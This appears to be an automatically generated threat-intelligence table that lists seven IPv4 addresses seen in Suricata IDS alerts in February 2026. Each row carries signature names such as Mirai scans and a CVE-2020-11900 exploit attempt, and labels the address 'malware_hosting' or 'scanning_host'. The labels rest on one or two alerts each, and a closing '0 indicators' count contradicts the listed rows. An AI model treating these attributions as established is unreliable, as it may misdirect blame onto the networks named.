| IPv4 | 65.49.1.166 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-26 | |
| IPv4 | 110.39.246.84 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=60001; cc=PK; asn=38264; asn_org=National WiMAXIMS environment | scanning_host | 2026-02-26 | |
| IPv4 | 64.62.156.189 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-27 | |
| IPv4 | 117.206.27.137 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=7574; cc=IN; asn=9829; asn_org=National Internet Backbone | scanning_host | 2026-02-28 | |
| IPv4 | 139.135.43.95 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd. | scanning_host | 2026-02-28 | |
| IPv4 | 64.62.197.10 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-28 | |
| IPv4 | 103.99.196.2 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=7574; cc=IN; asn=141275; asn_org=Maxnet Digital Pvt Ltd | scanning_host | 2026-02-28 |
0
Total STIX indicator objects.
Signal strength
0
Plenty of automated scanning; little human hands.